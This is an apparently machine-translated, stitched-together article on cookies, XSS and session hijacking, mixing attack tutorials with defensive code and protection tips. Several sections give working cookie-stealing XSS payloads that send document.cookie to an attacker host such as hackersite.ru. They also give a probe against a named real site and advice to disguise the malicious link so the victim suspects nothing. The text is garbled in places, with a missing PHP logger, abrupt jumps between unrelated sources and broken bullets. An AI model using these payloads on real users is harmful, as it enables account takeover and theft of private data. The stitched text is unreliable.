Stealing upcoming php. Session theft

What is a cookie?

There is a mechanism that allows an HTTP server to save some text information on the user's computer and read it back later. This information is called a cookie. Essentially, each cookie is a pair: a parameter name and its value. Each cookie is also assigned the domain it belongs to; for security reasons, every browser lets an HTTP server access only the cookies of its own domain. Additionally, a cookie may carry an expiration date, in which case it is kept on the computer until that date, even after all browser windows are closed.


Why are cookies important?

All multi-user systems use cookies to identify the user, or more precisely the user's current connection to the service, the user session. If someone learns your cookies, they will be able to log into the system on your behalf, because at the moment very few Internet resources check for IP address changes during a single user session.
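As an added illustration of the domain, path and expiry rules just described (example code written for this edit, not from the original article), the following Node.js snippet decides which cookies from a constructed sample jar a browser would attach to a given request. The functions follow the matching rules of RFC 6265; the jar contents, hostnames and values are made up.

```javascript
// Added example, not code from the original article: which stored cookies a
// browser would attach to a request, following the RFC 6265 domain-, path- and
// expiry-matching rules described above. The jar contents are constructed.

// RFC 6265 section 5.1.3: "www.example.com" domain-matches "example.com",
// but "example.com.evil" and "notexample.com" do not. A leading dot is ignored.
function domainMatches(host, cookieDomain) {
  host = host.toLowerCase();
  cookieDomain = cookieDomain.toLowerCase().replace(/^\./, "");
  return host === cookieDomain || host.endsWith("." + cookieDomain);
}

// RFC 6265 section 5.1.4: "/checkout" matches "/checkout" and "/checkout/pay",
// but not "/checkoutx".
function pathMatches(requestPath, cookiePath) {
  if (requestPath === cookiePath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith("/") || requestPath[cookiePath.length] === "/";
}

// All cookies in `jar` that a browser would send for `urlString` at time `now`:
// domain and path must match, expired cookies are dropped, and a Secure cookie
// is only sent over https.
function cookiesForRequest(jar, urlString, now = Date.now()) {
  const url = new URL(urlString);
  return jar
    .filter(c => domainMatches(url.hostname, c.domain))
    .filter(c => pathMatches(url.pathname, c.path || "/"))
    .filter(c => !c.expires || c.expires > now)
    .filter(c => !c.secure || url.protocol === "https:")
    .map(c => `${c.name}=${c.value}`);
}

// Constructed sample jar (hostnames and values are made up).
const SAMPLE_JAR = [
  { name: "sid",   value: "abc123", domain: "example.com",      path: "/", secure: true },
  { name: "pref",  value: "dark",   domain: ".example.com",     path: "/",
    expires: Date.parse("2000-01-01T00:00:00Z") },               // already expired
  { name: "cart",  value: "3",      domain: "shop.example.com", path: "/checkout" },
  { name: "other", value: "x",      domain: "example.com.evil" },
];

// Stand-alone demonstration at a fixed point in time.
const DEMO_NOW = Date.parse("2020-01-01T00:00:00Z");
for (const u of ["https://www.example.com/", "http://www.example.com/",
                 "https://shop.example.com/checkout/pay", "https://example.com.evil/"]) {
  console.log(u, "->", cookiesForRequest(SAMPLE_JAR, u, DEMO_NOW).join("; ") || "(none)");
}
```

Note that the Secure cookie is withheld from the plain-HTTP request entirely, which is exactly what keeps a session id off the wire where a sniffer could read it, and that the lookalike host example.com.evil receives only its own cookie.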


How to change or replace cookies?

Browser developers do not provide built-in tools for editing cookies. But you can get by with a regular notepad.


Step 1: create a text file with the following text (the bracketed line is the standard Internet Explorer context-menu extension key, named after the menu item used in Step 5):

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Working with Cookies]
@="C:\\IE_ext.htm"

Save it under the name IE_ext.reg

Step 2: Using the created file, add changes to the Windows registry.

Step 3: create a text file with the following text:

<script language="javascript">
// show the current cookies before the change
alert(external.menuArguments.document.cookie);
// copy the page's cookies to the clipboard
external.menuArguments.clipboardData.setData("Text", external.menuArguments.document.cookie);
// set (or replace) a cookie, then show the result
external.menuArguments.document.cookie = "testname=testvalue; path=/; domain=testdomain.ru";
alert(external.menuArguments.document.cookie);
</script>

Save it under the name C:\IE_ext.htm

Step 4: Go to the website you are interested in.

Step 5: Right-click on an empty area of the page and choose the menu item "Working with Cookies". Allow access to the clipboard. The cookies for this site are now on the clipboard; you can paste them into Notepad and take a look.


Step 6: To change some cookies, edit the file C:\IE_ext.htm, replacing testname with the cookie name, testvalue with its value and testdomain.ru with the site's domain. If necessary, add more similar lines. For ease of control, I added to the script the output of the current cookies before and after the change: alert(external.menuArguments.document.cookie);

Step 7: Perform Step 5 again, and then refresh the page.

Bottom line: we will access this Internet resource with updated cookies.

How to steal cookies using JavaScript?

If an attacker manages to find an opportunity to execute an arbitrary JavaScript script on the victim’s computer, then he can read the current cookies very easily. Example:


var str= document.cookie;

But will he be able to send them to his own site, given that, as I indicated earlier, a JavaScript script cannot access a site on a different domain without additional confirmation? It turns out that a JavaScript script can load any image located on any HTTP server, and at the same time pass arbitrary text to that server inside the request for the image. Example: http://hackersite.ru/xss.jpg?text_info So if you run this code:

var img=new Image();

img.src="http://hackersite.ru/xss.jpg?" + encodeURI(document.cookie);


then the cookies end up in the request for the "picture" and "travel" to the attacker.
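The trick just described leaves a trace in the vulnerable site's own access log: the reflected payload arrives URL-encoded in the query string of a request to the site. As an added example (written for this edit, not from the article), the Node.js snippet below parses Combined Log Format lines, decodes each request target (including double-encoded ones) and flags the markers of such payloads. The log lines are constructed samples and the host sniffer.invalid is a placeholder.

```javascript
// Added example, not from the article: scan web-server access-log lines for the
// reflected-XSS probes and cookie-exfiltration payloads described above.
// The log lines below are constructed samples.
const PATTERNS = [
  { name: "script-tag",    re: /<\s*script\b/i },
  { name: "cookie-read",   re: /document\s*\.\s*cookie/i },
  { name: "image-beacon",  re: /new\s+Image\s*\(/i },
  { name: "js-url-scheme", re: /javascript\s*:/i },
  { name: "event-handler", re: /\bon(error|load|mouseover)\s*=/i },
];

// Decode %xx and '+' repeatedly (payloads are often double-encoded) until the
// string stops changing; a malformed escape ends the loop with what we have.
function fullyDecode(s) {
  let prev, cur = s;
  do {
    prev = cur;
    try { cur = decodeURIComponent(cur.replace(/\+/g, " ")); } catch (e) { break; }
  } while (cur !== prev);
  return cur;
}

// Extract the fields we need from one Combined Log Format line.
function parseLogLine(line) {
  const m = line.match(/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+/);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]) };
}

// One alert per line that matches at least one pattern, listing the matched names.
function detectXssProbes(lines) {
  const alerts = [];
  for (const line of lines) {
    const req = parseLogLine(line);
    if (!req) continue;
    const decoded = fullyDecode(req.target);
    const hits = PATTERNS.filter(p => p.re.test(decoded)).map(p => p.name);
    if (hits.length) alerts.push({ ip: req.ip, time: req.time, target: req.target, hits });
  }
  return alerts;
}

// Constructed sample log: a normal search, a plain alert() probe, a double-encoded
// image-beacon exfiltration attempt, and an unrelated request.
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /srch/?words=cookies HTTP/1.1" 200 512',
  '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /srch/?words=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1" 200 530',
  '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /srch/?words=%2522%253E%253Cscript%253Eimg%253Dnew%2520Image()%253Bimg.src%253D%2522http%253A//sniffer.invalid/x.jpg%253F%2522%252Bdocument.cookie HTTP/1.1" 200 540',
  '198.51.100.9 - - [10/Oct/2023:13:56:10 +0000] "GET /profile?name=alice HTTP/1.1" 200 300',
];

for (const a of detectXssProbes(SAMPLE_LOG)) {
  console.log(`${a.time} ${a.ip} ${a.hits.join(",")} ${a.target}`);
}
```

The decode loop matters: the third sample line is encoded twice, and a single decodeURIComponent pass would still show %3Cscript%3E rather than a script tag, so a naive matcher would miss it.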

How to handle such requests to download an “image”?

An attacker only needs to find a hosting with PHP support and place code like this there:


Then all request parameters for this script are saved in the file log.txt. All that remains is to replace http://hackersite.ru/xss.jpg in the JavaScript shown earlier with the path to this PHP script.


Bottom line

I showed only the simplest way to exploit XSS vulnerabilities. But this proves that the presence of at least one such vulnerability on a multi-user Internet site can allow an attacker to use its resources on your behalf.

A friend of mine forgot the password to one site. However, he had previously checked the “Remember me” checkbox in the Google Chrome browser when logging in, which allowed him to access the site under his account. I received a question whether it is possible to transfer this magical state to another computer. It would have been more correct, of course, to change or restore the password, but my friend could not do this for reasons unrelated to the case.

How to use intercepter-ng for dummies

Despite the variety of modern software to choose from, it is difficult to find better hacking programs for Android than intercepter ng. The first criterion indicating in favor of this product is its actual performance. Most of the sniffers offered on the network are just imitations that do not perform their stated functions.

The next positive factors are the versatility of the application and coverage of a wide audience of users.


Let's start from the beginning. Cookies, or "cookie files", are very small text files, a kind of bookmark carrying information. The web server sends this information to the user's browser, where it is stored until it is required. Not quite clear? Well, fine, I'll try to make it even simpler. Look: you have registered on some website. At the moment of registration, these very "cookies" are created. That's what they are.

Cookie Cadger

The program listens to traffic on the WiFi network, intercepts cookies and replicates the user's session in your browser, repeating requests with his credentials. Author Matthew Sullivan gave a presentation of the program on September 30 at the Derbycon hacker conference. Right during the speech, Matthew Sullivan intercepted an unsecured session with Google of one of the conference visitors via WiFi.

How to steal cookies

If, while on a page of a website, you enter the following text into the address bar of your Firefox or Opera browser: javascript:document.write(document.cookie); then you will see something like: remixAdminsBar=0; remixGroupType=0; remixpass=******************; remixwall=0; remixInformation=0; remixMembersBar=0; remixdescription=0; remixautobookmark=8; remixemail=*******; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 Attention!

The Complete Guide to Cross-Site Scripting

XSS is a type of software vulnerability native to Web applications that allows an attacker to inject client-side script into Web pages viewed by other users. Wikipedia defines XSS as follows: "Cross-site scripting (XSS) is a type of software vulnerability native to Web applications (bypassing browser security restrictions) which allows an attacker to inject client-side script into web pages viewed by other users."

Difference between cookies and sessions

Not long ago I wrote an article about how to register and authorize users on a website. In this article I'm going to break down the difference between sessions and cookies, so that you can finally make your choice.

Cookies. No, it's not about cookies at all, it's about your safety. So you go to your favorite site “vkontakte” (or, for example, look at mail) on someone else’s computer, refuse the “save password” option, happily look through the mail and leave. And don’t think about the fact that you can now log into a social network or email under your name.

I'm not even considering the situation with a program that remembers the password without your knowledge. This is already a deliberate hack, and you will probably suspect that something like this could happen and you will not go to your favorite site on such a computer. But we can talk about simple human curiosity - you were visiting friends, and then suddenly they get the opportunity to read your mail. Are you sure they will refuse this opportunity? Aren't you afraid that something will come out? In any case, I will put aside questions of morality and just talk about how information is stored on the computer that you can now be allowed into some site without asking for a password.


And the name of this technology is cookies.

And this is where it all started. The HTTP protocol, through which you actually view sites (including this one), did not initially provide any way of maintaining a connection. That is, roughly speaking, you send a request to the site, receive a response, it is displayed on the screen, and then the server remembers nothing about you. This is fine when the site is purely informational and should not remember anything about you, but we live in the age of Web 2.0 😉 The natural development of the protocol was POST and GET requests: when you send some data, the server can write it to the database, but this is not enough.

Let's look at a very simple example: a forum. You registered, and the forum now has a record that there is such-and-such a user with such-and-such a password and some other additional data. Now you go to the forum and log in by entering your password. Somewhere there must be information that you are logged in. On the server? Of course not! The server cannot store the information that the authorization was made from your computer, because it cannot distinguish you from someone else (even your IP address does not uniquely identify you)! So the information that authorization has occurred must be stored on your computer. That's what cookies are for; that's what they were created for.

A cookie is a small record on your computer that stores information about the site you have visited. When you log in, a similar entry is created, after which you can walk around the forum, and it will recognize you. However, this will already happen automatically - thanks to the information stored in the cookie - so pretending that you are the main administrator of the forum will still not work bypassing the password check.

Now we can return to where this article began. If you logged in somewhere without even saving a password, an entry may have been created on the computer that now allows anyone to log into this resource under your name without authorization. Such an entry becomes outdated by itself after some time, but you can force it to be cleared. Each browser does this differently; I will show how it is done in my favorite, Google Chrome. Open the settings.

Go to the "Advanced" tab and find the "Show cookies" button.

Now, of course, you could delete all cookies, but this may upset the computer's owner. Instead, for example, enter the name of the site you are interested in into the top field.

Then you can clear only the cookies related to this site. You can try it on my site: if you log in to my forum and then clear your cookies, the login information will be forgotten. Try it!


1.What is XSS?
An XSS vulnerability allows arbitrary javascript code to be inserted into the body of a page. The XSS attack differs from others (for example, SQL injection or PHP injection) in that it affects the client, not the server.


With its help you cannot view database tables, load a shell, etc. The most common use of XSS is to steal cookies.
Cookies are a small piece of data created by a web server and stored on the user's computer as a file. Typically, cookies are used to store account information, and most often they contain an encrypted password, a login and a session ID (although not always).
XSS comes in two types, active and passive.

Passive XSS requires direct interaction from the victim, such as clicking on a link containing JavaScript code. When using this type of XSS, you cannot do without social engineering.

Active XSS does not require any participation from the victim; all they need to do is visit the page containing the XSS. Active XSS can be, for example, in messages on forums, chats, adding news, etc.

2.Search for XSS
In this section I will explain how to find XSS.

2.1.Passive XSS
To find passive XSS, just submit <script>alert('xss')</script> in an input form. If the script runs and a message box with "xss" appears, the vulnerability is present; if it did not run, you can also try "><script>alert()</script>, which is probably the most common form of XSS. If neither script worked, there is most likely no vulnerability.
Let's look at an example.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
Do you see the "search" form? Insert "><script>alert()</script> there and click "find".
A window with xss appears, which means XSS is present. (By the time you read this article, this XSS may already have been removed.)

2.2.Active XSS
Such XSS can be found, for example, in profile fields, when adding news (in the news title and, less often, in the news body), and in messages on forums, chats and guestbooks with HTML enabled. Everything is simple here: we enter the script from the previous subsection into the fields, and if the message box appears on the screen, the vulnerability is present.
Let's look at XSS in BB tags on forums.
You can try to simply insert JavaScript code into the [img] tag, for example like this:
[img]javascript:alert('xss')[/img]
Some tags have parameters; for example, the img tag has dynsrc and lowsrc parameters, so let's try to substitute the code like this:
[img]http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')[/img]
If the script worked, XSS is there.
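The probes above only work because the site echoes the submitted text back into the page without encoding it. As an added example (not code from the article or from any site it mentions), here is the server-side fix in Node.js: escape the search term for the HTML context it lands in, and accept only absolute http(s) URLs for user-supplied image sources, so that a javascript: URL or an injected attribute such as dynsrc has no effect. The functions renderSearchPage and renderImgTag are hypothetical stand-ins for a site's templates.

```javascript
// Added example, not from the article: output encoding and URL validation that
// neutralize the search-form and [img]-tag payloads discussed above.

// Escape the five characters that can break out of HTML text or a quoted attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  })[ch]);
}

// Only absolute http/https URLs are accepted as image sources; "javascript:",
// relative paths and unparseable input all fall back to a fixed placeholder.
function safeImageSrc(candidate) {
  try {
    const u = new URL(String(candidate).trim());
    if (u.protocol === "http:" || u.protocol === "https:") return u.href;
  } catch (e) { /* not a valid absolute URL */ }
  return "about:blank";
}

// Hypothetical search page: the term appears inside an attribute value and in text,
// and the same escaping is safe for both of these contexts.
function renderSearchPage(words) {
  const safe = escapeHtml(words);
  return `<form action="/srch/"><input name="words" value="${safe}"></form>` +
         `<p>Results for: ${safe}</p>`;
}

// Hypothetical forum [img] renderer: validate the URL first, then escape it for the
// attribute. A space in the input cannot start a new attribute because the URL
// parser percent-encodes it and the quotes are escaped.
function renderImgTag(url) {
  return `<img src="${escapeHtml(safeImageSrc(url))}" alt="">`;
}

console.log(renderSearchPage(`"><script>alert('xss')</script>`));
console.log(renderImgTag("javascript:alert('xss')"));
console.log(renderImgTag("http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')"));
```

Escaping is context-specific: the function above is correct for HTML text and double-quoted attribute values, which is where the page's examples land, but a value placed inside a script block or a URL needs a different encoder.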

3.Using XSS to Steal Cookies
Now the most delicious))))
In order to steal cookies, we need a web sniffer: you can install some kind of sniffer on your own hosting, or use one of the many online sniffers available now.
To steal cookies via passive XSS, the victim must follow a poisoned link. Instead of alert('xss'), we use another script:
<script>img = new Image(); img.src = "sniffer image address"+document.cookie;</script>

We substitute the script into the link, let the victim follow it, look at the sniffer log and rejoice.
Let's look at an example.
Let's take that XSS on Rambler from the previous paragraph.
We insert
"><script>img = new Image(); img.src = "sniffer image address"+document.cookie;</script>

in the search form, click “find”, look at the address bar and see:

http://miss.rambler.ru/srch/?sort=0& … &words =">
We send this link to the victim and enjoy the cookies.
Seeing such a link, the victim may suspect something, so it is advisable to URL-encode
"><script>img = new Image();img.src = "sniffer image address"+document.cookie;</script>
or to use a service like http://tinyurl.com/
Let's move on to active XSS. Everything is simple here: instead of alert() we insert <script>img = new Image();img.src = "address of the sniffer image"+document.cookie;</script>

Now we have cookies. But what to do with them? It's simple, you need to substitute them instead of your own. The Opera browser has a built-in cookie editor (tools->advanced->cookie management), there is a plugin for Firefox (I don’t remember what it’s called, use Google)
That's all for now, perhaps the article will be supplemented

The picture shows that the cookie contains the string wordpress_logged_in_263d663a02379b7624b1028a58464038=admin. This value is stored in the cookie unencrypted and can easily be intercepted with the Achilles utility, although in most cases Achilles shows only the hash of a particular entry. Before the request is sent to the server, you can try replacing this string with any similar one (although in this case there is no point), and the number of attempts is not limited. Then, by sending the request to the server with the Send button, you can receive the response the server intended for the administrator.

In the previous example, direct user ID substitution can be used. In addition, the parameter whose value is worth substituting, which gives the hacker additional opportunities, may be named as follows: user (for example, USER=JDOE), any expression containing an ID string (for example, USER=JDOE or SESSIONID=BLAHBLAH), admin (for example, ADMIN=TRUE), session (for example, SESSION=ACTIVE), cart (for example, CART=FULL), as well as values such as TRUE, FALSE, ACTIVE, INACTIVE. Typically, the format of cookies depends heavily on the application that uses them; however, these tips for finding application flaws through cookies apply to almost all formats.

Client-side countermeasures against cookie extraction

In general, users should be wary of Web sites that use cookies for authentication and to store sensitive data. It is also necessary to remember that a Web site that uses cookies for authentication must support at least the SSL protocol to encrypt the username and password, since in the absence of this protocol, the data is transmitted unencrypted, which makes it possible to intercept it using simple software tools to view data being sent over the network.

Kookaburra Software has developed a tool to make working with cookies easier. The tool is called CookiePal (http://www.kburra.com/cpal.html). This program is designed to alert the user when a Web site tries to set a cookie on the machine, and the user can allow or deny this action. Similar cookie-blocking functions are available in all browsers today.

Another reason for regularly installing Web browser updates is that security flaws in these programs are constantly being identified. So, Bennet Haselton and Jamie McCarthy created a script that, after clicking on a link, retrieves cookies from the client's machine. As a result, all the contents of the cookies that are on the user's machine become available.

This type of hack can also be accomplished by using a handle embedded in the HTML text of a Web page (or in the HTML content of an email or newsgroup posting) to steal cookies. Consider the following example:

To ensure that such things do not threaten our personal data, I do this myself and advise everyone to always update software that works with HTML code (e-mail clients, media players, browsers, etc.).

Many people prefer to simply block cookies, but most Web sites require cookies to be browsed. Conclusion - if in the near future an innovative technology appears that allows you to do without cookies, programmers and administrators will breathe a sigh of relief, but for now cookies remain a tasty morsel for a hacker! This is true, since a better alternative does not yet exist.

Server-side countermeasures

When it comes to recommendations for server security, experts give one simple piece of advice: do not use the cookie mechanism unless absolutely necessary! Particular care must be taken with cookies that remain on the user's system after the communication session ends.

Of course, it is important to understand that cookies can be used on Web servers for user authentication. If your application does need cookies, configure the cookie mechanism to use a different short-lived key for each session, and avoid putting information into these files that a hacker could use for an attack (such as ADMIN=TRUE).

Additionally, to make your use of cookies more secure, you can use cookie encryption to prevent sensitive information from being extracted. Of course, encryption does not solve all security problems when working with cookie technology, but this method will prevent the most basic hacks described above.

Cookies are information in the form of a text file saved on the user's computer by a website. They contain authentication data (login/password, ID, phone number, mailbox address), user settings and access status, and are stored in the browser profile.

Cookie hacking is the theft (or “hijacking”) of a web resource visitor’s session. Private information becomes available not only to the sender and recipient, but also to a third party - the person who carried out the interception.

Cookie Hacking Tools and Techniques

Computer thieves, like their colleagues in real life, in addition to skills, dexterity and knowledge, of course, also have their own tools - a kind of arsenal of master keys and probes. Let's take a look at the most popular tricks hackers use to extract cookies from Internet users.

Sniffers

Special programs for monitoring and analyzing network traffic. Their name comes from the English verb "sniff", because they literally "sniff out" the packets transmitted between nodes.

Attackers use a sniffer to intercept session data, messages and other confidential information. Their targets are mainly unprotected networks where cookies are sent in an open HTTP session, that is, practically unencrypted. (Public Wi-Fi is the most vulnerable in this regard.)

To embed a sniffer into the Internet channel between the user node and the web server, the following methods are used:

  • “listening” to network interfaces (hubs, switches);
  • branching and copying traffic;
  • inserting a tap into a break in the network link;
  • analysis through special attacks that redirect the victim’s traffic to the sniffer (MAC-spoofing, IP-spoofing).

The abbreviation XSS stands for Cross Site Scripting. Used to attack websites in order to steal user data.

The principle of XSS is as follows:

  • an attacker inserts malicious code (a special disguised script) into a web page of a website, forum, or into a message (for example, when corresponding on a social network);
  • the victim goes to the infected page and activates the installed code on his PC (clicks, follows a link, etc.);
  • in turn, the executed malicious code “extracts” the user’s confidential data from the browser (in particular, cookies) and sends it to the attacker’s web server.

In order to “implant” a software XSS mechanism, hackers use all sorts of vulnerabilities in web servers, online services and browsers.

All XSS vulnerabilities are divided into two types:

  • Passive. The attack is triggered by requesting a specific script on a web page. Malicious code can be injected into various forms on the page (for example, into the site's search bar). The most susceptible to passive XSS are resources that do not filter HTML tags in incoming data;
  • Active. Stored directly on the server and activated in the victim's browser. They are actively used by scammers in all kinds of blogs, chats and news feeds.

Hackers carefully “camouflage” their XSS scripts so that the victim does not suspect anything. They change the file extension, pass off the code as an image, motivate them to follow the link, and attract them with interesting content. As a result: a PC user, unable to control his own curiosity, with his own hand (with a mouse click) sends session cookies (with login and password!) to the author of the XSS script - the computer villain.

Cookie substitution

All cookies are saved and sent back to the web server they "came" from without any changes, in their original form, with the same values, strings and other data. Deliberate modification of their parameters is called cookie substitution. In other words, when substituting cookies the attacker passes off wishful thinking as reality. For example, when paying in an online store, the payment amount stored in a cookie is reduced, and the purchase becomes "cheaper".

Session cookies stolen from someone else's social network account are "inserted" into another session on another PC. The owner of the stolen cookies gets full access to the victim's account (correspondence, content, page settings) for as long as the victim remains on her page.

“Editing” cookies is carried out using:

  • “Manage cookies...” functions in the Opera browser;
  • Cookies Manager and Advanced Cookie Manager addons for FireFox;
  • IECookiesView utilities (Internet Explorer only);
  • a text editor such as AkelPad, NotePad or Windows Notepad.

Physical access to data

A very simple scheme, consisting of several steps. It is effective only if the victim's computer with an open session (for example, VKontakte) is left unattended, and for a long time:

  • A JavaScript function is entered into the browser's address bar to display all saved cookies.
  • After pressing "ENTER" they all appear on the page.
  • The cookies are copied, saved to a file, and then transferred to a flash drive.
  • On another PC, the cookies are substituted into a new session.
  • Access to the victim's account is obtained.

As a rule, hackers use the above tools (plus others) both in combination (since the level of protection on many web resources is quite high) and separately (when users are excessively naive).

XSS + sniffer

  • An XSS script is created, which specifies the address of an online sniffer (either home-made or a specific service).
  • The malicious code is saved with the extension .img (image format).
  • This file is then uploaded to a website page, chat, or personal message, wherever the attack will be carried out.
  • The user's attention is drawn to the created "trap" (this is where social engineering comes into play).
  • If the trap is triggered, the cookies from the victim's browser are intercepted by the sniffer.
  • The attacker opens the sniffer logs and retrieves the stolen cookies.
  • Next, a substitution is performed to obtain the rights of the account owner using the above tools.

Protecting cookies from hacking

  • Use an encrypted connection (using appropriate protocols and security methods).
  • Do not respond to dubious links, pictures, or tempting offers to familiarize yourself with "new free software", especially from strangers.
  • Use only trusted web resources.
  • End the authorized session by clicking the "Logout" button (not just closing the tab!), especially if you logged into your account not from a personal computer but, for example, from a PC in an Internet cafe.
  • Do not use the browser's "Save Password" feature. Stored registration data increases the risk of theft significantly. Don't be lazy; spend the few minutes it takes to enter your login and password at the beginning of each session.
  • After web surfing (visiting social networks, forums, chats, websites), delete saved cookies and clear the browser cache.
  • Regularly update browsers and antivirus software.
  • Use browser extensions that protect against XSS attacks (for example, NoScript for FF and Google Chrome).
  • Periodically in accounts.
  • And most importantly, do not lose vigilance and attention while relaxing or working on the Internet!